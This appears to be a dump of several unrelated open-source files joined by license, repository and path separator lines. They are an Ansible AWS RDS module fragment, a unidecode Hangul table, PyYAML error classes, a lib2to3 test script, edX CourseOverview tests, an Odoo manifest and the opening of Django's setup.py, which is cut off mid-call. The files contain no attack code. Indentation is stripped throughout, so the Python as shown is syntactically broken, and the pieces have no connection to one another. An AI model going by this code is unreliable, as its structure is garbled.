instance_name = module.params.get('instance_name')
new_instance_name = module.params.get('new_instance_name')
try:
result = conn.modify_db_instance(instance_name, **params)
except RDSException as e:
module.fail_json(msg=e.message)
if params.get('apply_immediately'):
if new_instance_name:
# Wait until the new instance name is valid
new_instance = None
while not new_instance:
new_instance = conn.get_db_instance(new_instance_name)
time.sleep(5)
# Found instance but it briefly flicks to available
# before rebooting so let's wait until we see it rebooting
# before we check whether to 'wait'
result = await_resource(conn, new_instance, 'rebooting', module)
if module.params.get('wait'):
resource = await_resource(conn, result, 'available', module)
else:
resource = conn.get_db_instance(instance_name)
# guess that this changed the DB, need a way to check
module.exit_json(changed=True, instance=resource.get_data())
def promote_db_instance(module, conn):
required_vars = ['instance_name']
valid_vars = ['backup_retention', 'backup_window']
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
result = conn.get_db_instance(instance_name)
if not result:
module.fail_json(msg="DB Instance %s does not exist" % instance_name)
if result.get_data().get('replication_source'):
try:
result = conn.promote_read_replica(instance_name, **params)
changed = True
except RDSException as e:
module.fail_json(msg=e.message)
else:
changed = False
if module.params.get('wait'):
resource = await_resource(conn, result, 'available', module)
else:
resource = conn.get_db_instance(instance_name)
module.exit_json(changed=changed, instance=resource.get_data())
def snapshot_db_instance(module, conn):
required_vars = ['instance_name', 'snapshot']
valid_vars = ['tags']
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
snapshot = module.params.get('snapshot')
changed = False
result = conn.get_db_snapshot(snapshot)
if not result:
try:
result = conn.create_db_snapshot(snapshot, instance_name, **params)
changed = True
except RDSException as e:
module.fail_json(msg=e.message)
if module.params.get('wait'):
resource = await_resource(conn, result, 'available', module)
else:
resource = conn.get_db_snapshot(snapshot)
module.exit_json(changed=changed, snapshot=resource.get_data())
def reboot_db_instance(module, conn):
required_vars = ['instance_name']
valid_vars = []
if HAS_RDS2:
valid_vars.append('force_failover')
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
result = conn.get_db_instance(instance_name)
changed = False
try:
result = conn.reboot_db_instance(instance_name, **params)
changed = True
except RDSException as e:
module.fail_json(msg=e.message)
if module.params.get('wait'):
resource = await_resource(conn, result, 'available', module)
else:
resource = conn.get_db_instance(instance_name)
module.exit_json(changed=changed, instance=resource.get_data())
def restore_db_instance(module, conn):
required_vars = ['instance_name', 'snapshot']
valid_vars = ['db_name', 'iops', 'license_model', 'multi_zone',
'option_group', 'port', 'publicly_accessible',
'subnet', 'tags', 'upgrade', 'zone']
if HAS_RDS2:
valid_vars.append('instance_type')
else:
required_vars.append('instance_type')
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
instance_type = module.params.get('instance_type')
snapshot = module.params.get('snapshot')
changed = False
result = conn.get_db_instance(instance_name)
if not result:
try:
result = conn.restore_db_instance_from_db_snapshot(instance_name, snapshot, instance_type, **params)
changed = True
except RDSException as e:
module.fail_json(msg=e.message)
if module.params.get('wait'):
resource = await_resource(conn, result, 'available', module)
else:
resource = conn.get_db_instance(instance_name)
module.exit_json(changed=changed, instance=resource.get_data())
def validate_parameters(required_vars, valid_vars, module):
command = module.params.get('command')
for v in required_vars:
if not module.params.get(v):
module.fail_json(msg="Parameter %s required for %s command" % (v, command))
# map to convert rds module options to boto rds and rds2 options
optional_params = {
'port': 'port',
'db_name': 'db_name',
'zone': 'availability_zone',
'maint_window': 'preferred_maintenance_window',
'backup_window': 'preferred_backup_window',
'backup_retention': 'backup_retention_period',
'multi_zone': 'multi_az',
'engine_version': 'engine_version',
'upgrade': 'auto_minor_version_upgrade',
'subnet': 'db_subnet_group_name',
'license_model': 'license_model',
'option_group': 'option_group_name',
'size': 'allocated_storage',
'iops': 'iops',
'new_instance_name': 'new_instance_id',
'apply_immediately': 'apply_immediately',
}
# map to convert rds module options to boto rds options
optional_params_rds = {
'db_engine': 'engine',
'password': 'master_password',
'parameter_group': 'param_group',
'instance_type': 'instance_class',
}
# map to convert rds module options to boto rds2 options
optional_params_rds2 = {
'tags': 'tags',
'publicly_accessible': 'publicly_accessible',
'parameter_group': 'db_parameter_group_name',
'character_set_name': 'character_set_name',
'instance_type': 'db_instance_class',
'password': 'master_user_password',
'new_instance_name': 'new_db_instance_identifier',
'force_failover': 'force_failover',
}
if HAS_RDS2:
optional_params.update(optional_params_rds2)
sec_group = 'db_security_groups'
else:
optional_params.update(optional_params_rds)
sec_group = 'security_groups'
# Check for options only supported with rds2
for k in set(optional_params_rds2.keys()) - set(optional_params_rds.keys()):
if module.params.get(k):
module.fail_json(msg="Parameter %s requires boto.rds (boto >= 2.26.0)" % k)
params = {}
for (k, v) in optional_params.items():
if module.params.get(k) is not None and k not in required_vars:
if k in valid_vars:
params[v] = module.params[k]
else:
if module.params.get(k) is False:
pass
else:
module.fail_json(msg="Parameter %s is not valid for %s command" % (k, command))
if module.params.get('security_groups'):
params[sec_group] = module.params.get('security_groups').split(',')
vpc_groups = module.params.get('vpc_security_groups')
if vpc_groups:
if HAS_RDS2:
params['vpc_security_group_ids'] = vpc_groups
else:
groups_list = []
for x in vpc_groups:
groups_list.append(boto.rds.VPCSecurityGroupMembership(vpc_group=x))
params['vpc_security_groups'] = groups_list
# Convert tags dict to list of tuples that rds2 expects
if 'tags' in params:
params['tags'] = module.params['tags'].items()
return params
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
command=dict(choices=['create', 'replicate', 'delete', 'facts', 'modify', 'promote', 'snapshot', 'reboot', 'restore'], required=True),
instance_name=dict(required=False),
source_instance=dict(required=False),
db_engine=dict(choices=['mariadb', 'MySQL', 'oracle-se1', 'oracle-se2', 'oracle-se', 'oracle-ee', 'sqlserver-ee', 'sqlserver-se', 'sqlserver-ex',
'sqlserver-web', 'postgres', 'aurora'], required=False),
size=dict(required=False),
instance_type=dict(aliases=['type'], required=False),
username=dict(required=False),
password=dict(no_log=True, required=False),
db_name=dict(required=False),
engine_version=dict(required=False),
parameter_group=dict(required=False),
license_model=dict(choices=['license-included', 'bring-your-own-license', 'general-public-license', 'postgresql-license'], required=False),
multi_zone=dict(type='bool', required=False),
iops=dict(required=False),
security_groups=dict(required=False),
vpc_security_groups=dict(type='list', required=False),
port=dict(required=False, type='int'),
upgrade=dict(type='bool', default=False),
option_group=dict(required=False),
maint_window=dict(required=False),
backup_window=dict(required=False),
backup_retention=dict(required=False),
zone=dict(aliases=['aws_zone', 'ec2_zone'], required=False),
subnet=dict(required=False),
wait=dict(type='bool', default=False),
wait_timeout=dict(type='int', default=300),
snapshot=dict(required=False),
apply_immediately=dict(type='bool', default=False),
new_instance_name=dict(required=False),
tags=dict(type='dict', required=False),
publicly_accessible=dict(required=False),
character_set_name=dict(required=False),
force_failover=dict(type='bool', required=False, default=False)
)
)
module = AnsibleModule(
argument_spec=argument_spec,
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
invocations = {
'create': create_db_instance,
'replicate': replicate_db_instance,
'delete': delete_db_instance_or_snapshot,
'facts': facts_db_instance_or_snapshot,
'modify': modify_db_instance,
'promote': promote_db_instance,
'snapshot': snapshot_db_instance,
'reboot': reboot_db_instance,
'restore': restore_db_instance,
}
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if not region:
module.fail_json(msg="Region not specified. Unable to determine region from EC2_REGION.")
# set port to per db defaults if not specified
if module.params['port'] is None and module.params['db_engine'] is not None and module.params['command'] == 'create':
if '-' in module.params['db_engine']:
engine = module.params['db_engine'].split('-')[0]
else:
engine = module.params['db_engine']
module.params['port'] = DEFAULT_PORTS[engine.lower()]
# connect to the rds endpoint
if HAS_RDS2:
conn = RDS2Connection(module, region, **aws_connect_params)
else:
conn = RDSConnection(module, region, **aws_connect_params)
invocations[module.params.get('command')](module, conn)
if __name__ == '__main__':
main()
| gpl-3.0 |
SamaraCardoso27/eMakeup | backend/venv/lib/python2.7/site-packages/unidecode/x0d0.py | 253 | 4706 | data = (
'kweon', # 0x00
'kweonj', # 0x01
'kweonh', # 0x02
'kweod', # 0x03
'kweol', # 0x04
'kweolg', # 0x05
'kweolm', # 0x06
'kweolb', # 0x07
'kweols', # 0x08
'kweolt', # 0x09
'kweolp', # 0x0a
'kweolh', # 0x0b
'kweom', # 0x0c
'kweob', # 0x0d
'kweobs', # 0x0e
'kweos', # 0x0f
'kweoss', # 0x10
'kweong', # 0x11
'kweoj', # 0x12
'kweoc', # 0x13
'kweok', # 0x14
'kweot', # 0x15
'kweop', # 0x16
'kweoh', # 0x17
'kwe', # 0x18
'kweg', # 0x19
'kwegg', # 0x1a
'kwegs', # 0x1b
'kwen', # 0x1c
'kwenj', # 0x1d
'kwenh', # 0x1e
'kwed', # 0x1f
'kwel', # 0x20
'kwelg', # 0x21
'kwelm', # 0x22
'kwelb', # 0x23
'kwels', # 0x24
'kwelt', # 0x25
'kwelp', # 0x26
'kwelh', # 0x27
'kwem', # 0x28
'kweb', # 0x29
'kwebs', # 0x2a
'kwes', # 0x2b
'kwess', # 0x2c
'kweng', # 0x2d
'kwej', # 0x2e
'kwec', # 0x2f
'kwek', # 0x30
'kwet', # 0x31
'kwep', # 0x32
'kweh', # 0x33
'kwi', # 0x34
'kwig', # 0x35
'kwigg', # 0x36
'kwigs', # 0x37
'kwin', # 0x38
'kwinj', # 0x39
'kwinh', # 0x3a
'kwid', # 0x3b
'kwil', # 0x3c
'kwilg', # 0x3d
'kwilm', # 0x3e
'kwilb', # 0x3f
'kwils', # 0x40
'kwilt', # 0x41
'kwilp', # 0x42
'kwilh', # 0x43
'kwim', # 0x44
'kwib', # 0x45
'kwibs', # 0x46
'kwis', # 0x47
'kwiss', # 0x48
'kwing', # 0x49
'kwij', # 0x4a
'kwic', # 0x4b
'kwik', # 0x4c
'kwit', # 0x4d
'kwip', # 0x4e
'kwih', # 0x4f
'kyu', # 0x50
'kyug', # 0x51
'kyugg', # 0x52
'kyugs', # 0x53
'kyun', # 0x54
'kyunj', # 0x55
'kyunh', # 0x56
'kyud', # 0x57
'kyul', # 0x58
'kyulg', # 0x59
'kyulm', # 0x5a
'kyulb', # 0x5b
'kyuls', # 0x5c
'kyult', # 0x5d
'kyulp', # 0x5e
'kyulh', # 0x5f
'kyum', # 0x60
'kyub', # 0x61
'kyubs', # 0x62
'kyus', # 0x63
'kyuss', # 0x64
'kyung', # 0x65
'kyuj', # 0x66
'kyuc', # 0x67
'kyuk', # 0x68
'kyut', # 0x69
'kyup', # 0x6a
'kyuh', # 0x6b
'keu', # 0x6c
'keug', # 0x6d
'keugg', # 0x6e
'keugs', # 0x6f
'keun', # 0x70
'keunj', # 0x71
'keunh', # 0x72
'keud', # 0x73
'keul', # 0x74
'keulg', # 0x75
'keulm', # 0x76
'keulb', # 0x77
'keuls', # 0x78
'keult', # 0x79
'keulp', # 0x7a
'keulh', # 0x7b
'keum', # 0x7c
'keub', # 0x7d
'keubs', # 0x7e
'keus', # 0x7f
'keuss', # 0x80
'keung', # 0x81
'keuj', # 0x82
'keuc', # 0x83
'keuk', # 0x84
'keut', # 0x85
'keup', # 0x86
'keuh', # 0x87
'kyi', # 0x88
'kyig', # 0x89
'kyigg', # 0x8a
'kyigs', # 0x8b
'kyin', # 0x8c
'kyinj', # 0x8d
'kyinh', # 0x8e
'kyid', # 0x8f
'kyil', # 0x90
'kyilg', # 0x91
'kyilm', # 0x92
'kyilb', # 0x93
'kyils', # 0x94
'kyilt', # 0x95
'kyilp', # 0x96
'kyilh', # 0x97
'kyim', # 0x98
'kyib', # 0x99
'kyibs', # 0x9a
'kyis', # 0x9b
'kyiss', # 0x9c
'kying', # 0x9d
'kyij', # 0x9e
'kyic', # 0x9f
'kyik', # 0xa0
'kyit', # 0xa1
'kyip', # 0xa2
'kyih', # 0xa3
'ki', # 0xa4
'kig', # 0xa5
'kigg', # 0xa6
'kigs', # 0xa7
'kin', # 0xa8
'kinj', # 0xa9
'kinh', # 0xaa
'kid', # 0xab
'kil', # 0xac
'kilg', # 0xad
'kilm', # 0xae
'kilb', # 0xaf
'kils', # 0xb0
'kilt', # 0xb1
'kilp', # 0xb2
'kilh', # 0xb3
'kim', # 0xb4
'kib', # 0xb5
'kibs', # 0xb6
'kis', # 0xb7
'kiss', # 0xb8
'king', # 0xb9
'kij', # 0xba
'kic', # 0xbb
'kik', # 0xbc
'kit', # 0xbd
'kip', # 0xbe
'kih', # 0xbf
'ta', # 0xc0
'tag', # 0xc1
'tagg', # 0xc2
'tags', # 0xc3
'tan', # 0xc4
'tanj', # 0xc5
'tanh', # 0xc6
'tad', # 0xc7
'tal', # 0xc8
'talg', # 0xc9
'talm', # 0xca
'talb', # 0xcb
'tals', # 0xcc
'talt', # 0xcd
'talp', # 0xce
'talh', # 0xcf
'tam', # 0xd0
'tab', # 0xd1
'tabs', # 0xd2
'tas', # 0xd3
'tass', # 0xd4
'tang', # 0xd5
'taj', # 0xd6
'tac', # 0xd7
'tak', # 0xd8
'tat', # 0xd9
'tap', # 0xda
'tah', # 0xdb
'tae', # 0xdc
'taeg', # 0xdd
'taegg', # 0xde
'taegs', # 0xdf
'taen', # 0xe0
'taenj', # 0xe1
'taenh', # 0xe2
'taed', # 0xe3
'tael', # 0xe4
'taelg', # 0xe5
'taelm', # 0xe6
'taelb', # 0xe7
'taels', # 0xe8
'taelt', # 0xe9
'taelp', # 0xea
'taelh', # 0xeb
'taem', # 0xec
'taeb', # 0xed
'taebs', # 0xee
'taes', # 0xef
'taess', # 0xf0
'taeng', # 0xf1
'taej', # 0xf2
'taec', # 0xf3
'taek', # 0xf4
'taet', # 0xf5
'taep', # 0xf6
'taeh', # 0xf7
'tya', # 0xf8
'tyag', # 0xf9
'tyagg', # 0xfa
'tyags', # 0xfb
'tyan', # 0xfc
'tyanj', # 0xfd
'tyanh', # 0xfe
'tyad', # 0xff
)
| mit |
spywhere/Testful | yaml/error.py | 294 | 2533 |
__all__ = ['Mark', 'YAMLError', 'MarkedYAMLError']
class Mark:
def __init__(self, name, index, line, column, buffer, pointer):
self.name = name
self.index = index
self.line = line
self.column = column
self.buffer = buffer
self.pointer = pointer
def get_snippet(self, indent=4, max_length=75):
if self.buffer is None:
return None
head = ''
start = self.pointer
while start > 0 and self.buffer[start-1] not in '\0\r\n\x85\u2028\u2029':
start -= 1
if self.pointer-start > max_length/2-1:
head = ' ... '
start += 5
break
tail = ''
end = self.pointer
while end < len(self.buffer) and self.buffer[end] not in '\0\r\n\x85\u2028\u2029':
end += 1
if end-self.pointer > max_length/2-1:
tail = ' ... '
end -= 5
break
snippet = self.buffer[start:end]
return ' '*indent + head + snippet + tail + '\n' \
+ ' '*(indent+self.pointer-start+len(head)) + '^'
def __str__(self):
snippet = self.get_snippet()
where = " in \"%s\", line %d, column %d" \
% (self.name, self.line+1, self.column+1)
if snippet is not None:
where += ":\n"+snippet
return where
class YAMLError(Exception):
pass
class MarkedYAMLError(YAMLError):
def __init__(self, context=None, context_mark=None,
problem=None, problem_mark=None, note=None):
self.context = context
self.context_mark = context_mark
self.problem = problem
self.problem_mark = problem_mark
self.note = note
def __str__(self):
lines = []
if self.context is not None:
lines.append(self.context)
if self.context_mark is not None \
and (self.problem is None or self.problem_mark is None
or self.context_mark.name != self.problem_mark.name
or self.context_mark.line != self.problem_mark.line
or self.context_mark.column != self.problem_mark.column):
lines.append(str(self.context_mark))
if self.problem is not None:
lines.append(self.problem)
if self.problem_mark is not None:
lines.append(str(self.problem_mark))
if self.note is not None:
lines.append(self.note)
return '\n'.join(lines)
| mit |
bhargav2408/python-for-android | python3-alpha/python3-src/Lib/lib2to3/tests/pytree_idempotency.py | 56 | 2405 | #!/usr/bin/env python3
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Main program for testing the infrastructure."""
__author__ = "Guido van Rossum <guido@python.org>"
# Support imports (need to be imported first)
from . import support
# Python imports
import os
import sys
import logging
# Local imports
from .. import pytree
import pgen2
from pgen2 import driver
logging.basicConfig()
def main():
gr = driver.load_grammar("Grammar.txt")
dr = driver.Driver(gr, convert=pytree.convert)
fn = "example.py"
tree = dr.parse_file(fn, debug=True)
if not diff(fn, tree):
print("No diffs.")
if not sys.argv[1:]:
return # Pass a dummy argument to run the complete test suite below
problems = []
# Process every imported module
for name in sys.modules:
mod = sys.modules[name]
if mod is None or not hasattr(mod, "__file__"):
continue
fn = mod.__file__
if fn.endswith(".pyc"):
fn = fn[:-1]
if not fn.endswith(".py"):
continue
print("Parsing", fn, file=sys.stderr)
tree = dr.parse_file(fn, debug=True)
if diff(fn, tree):
problems.append(fn)
# Process every single module on sys.path (but not in packages)
for dir in sys.path:
try:
names = os.listdir(dir)
except os.error:
continue
print("Scanning", dir, "...", file=sys.stderr)
for name in names:
if not name.endswith(".py"):
continue
print("Parsing", name, file=sys.stderr)
fn = os.path.join(dir, name)
try:
tree = dr.parse_file(fn, debug=True)
except pgen2.parse.ParseError as err:
print("ParseError:", err)
else:
if diff(fn, tree):
problems.append(fn)
# Show summary of problem files
if not problems:
print("No problems. Congratulations!")
else:
print("Problems in following files:")
for fn in problems:
print("***", fn)
def diff(fn, tree):
f = open("@", "w")
try:
f.write(str(tree))
finally:
f.close()
try:
return os.system("diff -u %s @" % fn)
finally:
os.remove("@")
if __name__ == "__main__":
main()
| apache-2.0 |
ak2703/edx-platform | openedx/core/djangoapps/content/course_overviews/tests.py | 5 | 15602 | """
Tests for course_overviews app.
"""
import datetime
import ddt
import itertools
import pytz
import math
import mock
from django.utils import timezone
from lms.djangoapps.certificates.api import get_active_web_certificate
from lms.djangoapps.courseware.courses import course_image_url
from xmodule.course_metadata_utils import DEFAULT_START_DATE
from xmodule.error_module import ErrorDescriptor
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, check_mongo_calls, check_mongo_calls_range
from .models import CourseOverview
@ddt.ddt
class CourseOverviewTestCase(ModuleStoreTestCase):
"""
Tests for CourseOverviewDescriptor model.
"""
TODAY = timezone.now()
LAST_MONTH = TODAY - datetime.timedelta(days=30)
LAST_WEEK = TODAY - datetime.timedelta(days=7)
NEXT_WEEK = TODAY + datetime.timedelta(days=7)
NEXT_MONTH = TODAY + datetime.timedelta(days=30)
def check_course_overview_against_course(self, course):
"""
Compares a CourseOverview object against its corresponding
CourseDescriptor object.
Specifically, given a course, test that data within the following three
objects match each other:
- the CourseDescriptor itself
- a CourseOverview that was newly constructed from _create_from_course
- a CourseOverview that was loaded from the MySQL database
Arguments:
course (CourseDescriptor): the course to be checked.
"""
def get_seconds_since_epoch(date_time):
"""
Returns the number of seconds between the Unix Epoch and the given
datetime. If the given datetime is None, return None.
Arguments:
date_time (datetime): the datetime in question.
"""
if date_time is None:
return None
epoch = datetime.datetime.utcfromtimestamp(0).replace(tzinfo=pytz.utc)
return math.floor((date_time - epoch).total_seconds())
# Load the CourseOverview from the cache twice. The first load will be a cache miss (because the cache
# is empty) so the course will be newly created with CourseOverviewDescriptor.create_from_course. The second
# load will be a cache hit, so the course will be loaded from the cache.
course_overview_cache_miss = CourseOverview.get_from_id(course.id)
course_overview_cache_hit = CourseOverview.get_from_id(course.id)
# Test if value of these attributes match between the three objects
fields_to_test = [
'id',
'display_name',
'display_number_with_default',
'display_org_with_default',
'advertised_start',
'facebook_url',
'social_sharing_url',
'certificates_display_behavior',
'certificates_show_before_end',
'cert_name_short',
'cert_name_long',
'lowest_passing_grade',
'end_of_course_survey_url',
'mobile_available',
'visible_to_staff_only',
'location',
'number',
'url_name',
'display_name_with_default',
'start_date_is_still_default',
'pre_requisite_courses',
'enrollment_domain',
'invitation_only',
'max_student_enrollments_allowed',
]
for attribute_name in fields_to_test:
course_value = getattr(course, attribute_name)
cache_miss_value = getattr(course_overview_cache_miss, attribute_name)
cache_hit_value = getattr(course_overview_cache_hit, attribute_name)
self.assertEqual(course_value, cache_miss_value)
self.assertEqual(cache_miss_value, cache_hit_value)
# Test if return values for all methods are equal between the three objects
methods_to_test = [
('clean_id', ()),
('clean_id', ('#',)),
('has_ended', ()),
('has_started', ()),
('start_datetime_text', ('SHORT_DATE',)),
('start_datetime_text', ('DATE_TIME',)),
('end_datetime_text', ('SHORT_DATE',)),
('end_datetime_text', ('DATE_TIME',)),
('may_certify', ()),
]
for method_name, method_args in methods_to_test:
course_value = getattr(course, method_name)(*method_args)
cache_miss_value = getattr(course_overview_cache_miss, method_name)(*method_args)
cache_hit_value = getattr(course_overview_cache_hit, method_name)(*method_args)
self.assertEqual(course_value, cache_miss_value)
self.assertEqual(cache_miss_value, cache_hit_value)
# Other values to test
# Note: we test the start and end attributes here instead of in
# fields_to_test, because I ran into trouble while testing datetimes
# for equality. When writing and reading dates from databases, the
# resulting values are often off by fractions of a second. So, as a
# workaround, we simply test if the start and end times are the same
# number of seconds from the Unix epoch.
others_to_test = [
(
course_image_url(course),
course_overview_cache_miss.course_image_url,
course_overview_cache_hit.course_image_url
),
(
get_active_web_certificate(course) is not None,
course_overview_cache_miss.has_any_active_web_certificate,
course_overview_cache_hit.has_any_active_web_certificate
),
(
get_seconds_since_epoch(course.start),
get_seconds_since_epoch(course_overview_cache_miss.start),
get_seconds_since_epoch(course_overview_cache_hit.start),
),
(
get_seconds_since_epoch(course.end),
get_seconds_since_epoch(course_overview_cache_miss.end),
get_seconds_since_epoch(course_overview_cache_hit.end),
),
(
get_seconds_since_epoch(course.enrollment_start),
get_seconds_since_epoch(course_overview_cache_miss.enrollment_start),
get_seconds_since_epoch(course_overview_cache_hit.enrollment_start),
),
(
get_seconds_since_epoch(course.enrollment_end),
get_seconds_since_epoch(course_overview_cache_miss.enrollment_end),
get_seconds_since_epoch(course_overview_cache_hit.enrollment_end),
),
]
for (course_value, cache_miss_value, cache_hit_value) in others_to_test:
self.assertEqual(course_value, cache_miss_value)
self.assertEqual(cache_miss_value, cache_hit_value)
@ddt.data(*itertools.product(
[
{
"display_name": "Test Course", # Display name provided
"start": LAST_WEEK, # In the middle of the course
"end": NEXT_WEEK,
"advertised_start": "2015-01-01 11:22:33", # Parse-able advertised_start
"pre_requisite_courses": [ # Has pre-requisites
'course-v1://edX+test1+run1',
'course-v1://edX+test2+run1'
],
"static_asset_path": "/my/abs/path", # Absolute path
"certificates_show_before_end": True,
},
{
"display_name": "", # Empty display name
"start": NEXT_WEEK, # Course hasn't started yet
"end": NEXT_MONTH,
"advertised_start": "Very Soon!", # Not parse-able advertised_start
"pre_requisite_courses": [], # No pre-requisites
"static_asset_path": "my/relative/path", # Relative asset path
"certificates_show_before_end": False,
},
{
"display_name": "", # Empty display name
"start": LAST_MONTH, # Course already ended
"end": LAST_WEEK,
"advertised_start": None, # No advertised start
"pre_requisite_courses": [], # No pre-requisites
"static_asset_path": "", # Empty asset path
"certificates_show_before_end": False,
},
{
# # Don't set display name
"start": DEFAULT_START_DATE, # Default start and end dates
"end": None,
"advertised_start": None, # No advertised start
"pre_requisite_courses": [], # No pre-requisites
"static_asset_path": None, # No asset path
"certificates_show_before_end": False,
}
],
[ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split]
))
@ddt.unpack
def test_course_overview_behavior(self, course_kwargs, modulestore_type):
"""
Tests if CourseOverviews and CourseDescriptors behave the same
by comparing pairs of them given a variety of scenarios.
Arguments:
course_kwargs (dict): kwargs to be passed to course constructor.
modulestore_type (ModuleStoreEnum.Type): type of store to create the
course in.
"""
# Note: We specify a value for 'run' here because, for some reason,
# .create raises an InvalidKeyError if we don't (even though my
# other test functions don't specify a run but work fine).
course = CourseFactory.create(default_store=modulestore_type, run="TestRun", **course_kwargs)
self.check_course_overview_against_course(course)
@ddt.data(ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split)
def test_course_overview_cache_invalidation(self, modulestore_type):
"""
Tests that when a course is published or deleted, the corresponding
course_overview is removed from the cache.
Arguments:
modulestore_type (ModuleStoreEnum.Type): type of store to create the
course in.
"""
with self.store.default_store(modulestore_type):
# Create a course where mobile_available is True.
course = CourseFactory.create(mobile_available=True, default_store=modulestore_type)
course_overview_1 = CourseOverview.get_from_id(course.id)
self.assertTrue(course_overview_1.mobile_available)
# Set mobile_available to False and update the course.
# This fires a course_published signal, which should be caught in signals.py, which should in turn
# delete the corresponding CourseOverview from the cache.
course.mobile_available = False
with self.store.branch_setting(ModuleStoreEnum.Branch.draft_preferred):
self.store.update_item(course, ModuleStoreEnum.UserID.test)
# Make sure that when we load the CourseOverview again, mobile_available is updated.
course_overview_2 = CourseOverview.get_from_id(course.id)
self.assertFalse(course_overview_2.mobile_available)
# Verify that when the course is deleted, the corresponding CourseOverview is deleted as well.
with self.assertRaises(CourseOverview.DoesNotExist):
self.store.delete_course(course.id, ModuleStoreEnum.UserID.test)
CourseOverview.get_from_id(course.id)
@ddt.data((ModuleStoreEnum.Type.mongo, 1, 1), (ModuleStoreEnum.Type.split, 3, 4))
@ddt.unpack
def test_course_overview_caching(self, modulestore_type, min_mongo_calls, max_mongo_calls):
"""
Tests that CourseOverview structures are actually getting cached.
Arguments:
modulestore_type (ModuleStoreEnum.Type): type of store to create the
course in.
min_mongo_calls (int): minimum number of MongoDB queries we expect
to be made.
max_mongo_calls (int): maximum number of MongoDB queries we expect
to be made.
"""
course = CourseFactory.create(default_store=modulestore_type)
# The first time we load a CourseOverview, it will be a cache miss, so
# we expect the modulestore to be queried.
with check_mongo_calls_range(max_finds=max_mongo_calls, min_finds=min_mongo_calls):
_course_overview_1 = CourseOverview.get_from_id(course.id)
# The second time we load a CourseOverview, it will be a cache hit, so
# we expect no modulestore queries to be made.
with check_mongo_calls(0):
_course_overview_2 = CourseOverview.get_from_id(course.id)
@ddt.data(ModuleStoreEnum.Type.split, ModuleStoreEnum.Type.mongo)
def test_get_non_existent_course(self, modulestore_type):
"""
Tests that requesting a non-existent course from get_from_id raises
CourseOverview.DoesNotExist.
Arguments:
modulestore_type (ModuleStoreEnum.Type): type of store to create the
course in.
"""
store = modulestore()._get_modulestore_by_type(modulestore_type) # pylint: disable=protected-access
with self.assertRaises(CourseOverview.DoesNotExist):
CourseOverview.get_from_id(store.make_course_key('Non', 'Existent', 'Course'))
@ddt.data(ModuleStoreEnum.Type.split, ModuleStoreEnum.Type.mongo)
def test_get_errored_course(self, modulestore_type):
"""
Test that getting an ErrorDescriptor back from the module store causes
get_from_id to raise an IOError.
Arguments:
modulestore_type (ModuleStoreEnum.Type): type of store to create the
course in.
"""
course = CourseFactory.create(default_store=modulestore_type)
mock_get_course = mock.Mock(return_value=ErrorDescriptor)
with mock.patch('xmodule.modulestore.mixed.MixedModuleStore.get_course', mock_get_course):
# This mock makes it so when the module store tries to load course data,
# an exception is thrown, which causes get_course to return an ErrorDescriptor,
# which causes get_from_id to raise an IOError.
with self.assertRaises(IOError):
CourseOverview.get_from_id(course.id)
def test_malformed_grading_policy(self):
"""
Test that CourseOverview handles courses with a malformed grading policy
such that course._grading_policy['GRADE_CUTOFFS'] = {} by defaulting
.lowest_passing_grade to None.
Created in response to https://openedx.atlassian.net/browse/TNL-2806.
"""
course = CourseFactory.create()
course._grading_policy['GRADE_CUTOFFS'] = {} # pylint: disable=protected-access
with self.assertRaises(ValueError):
__ = course.lowest_passing_grade
course_overview = CourseOverview._create_from_course(course) # pylint: disable=protected-access
self.assertEqual(course_overview.lowest_passing_grade, None)
| agpl-3.0 |
rschnapka/odoo | addons/base_action_rule/__openerp__.py | 57 | 1998 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Automated Action Rules',
'version': '1.0',
'category': 'Sales Management',
'description': """
This module allows to implement action rules for any object.
============================================================
Use automated actions to automatically trigger actions for various screens.
**Example:** A lead created by a specific user may be automatically set to a specific
sales team, or an opportunity which still has status pending after 14 days might
trigger an automatic reminder email.
""",
'author': 'OpenERP SA',
'website': 'http://www.openerp.com',
'depends': ['base', 'mail'],
'data': [
'base_action_rule_view.xml',
'security/ir.model.access.csv',
'base_action_rule_data.xml'
],
'demo': [],
'installable': True,
'auto_install': False,
'images': ['images/base_action_rule1.jpeg','images/base_action_rule2.jpeg','images/base_action_rule3.jpeg'],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
benjaminrigaud/django | setup.py | 41 | 3302 | import os
import sys
from setuptools import setup, find_packages
from distutils.sysconfig import get_python_lib
# Warn if we are installing over top of an existing installation. This can
# cause issues where files that were deleted from a more recent Django are
# still present in site-packages. See #18115.
overlay_warning = False
if "install" in sys.argv:
lib_paths = [get_python_lib()]
if lib_paths[0].startswith("/usr/lib/"):
# We have to try also with an explicit prefix of /usr/local in order to
# catch Debian's custom user site-packages directory.
lib_paths.append(get_python_lib(prefix="/usr/local"))
for lib_path in lib_paths:
existing_path = os.path.abspath(os.path.join(lib_path, "django"))
if os.path.exists(existing_path):
# We note the need for the warning here, but present it after the
# command is run, so it's more likely to be seen.
overlay_warning = True
break
EXCLUDE_FROM_PACKAGES = ['django.conf.project_template',
'django.conf.app_template',
'django.bin']
# Dynamically calculate the version based on django.VERSION.
version = __import__('django').get_version()
setup(
name='Django',
version=version,
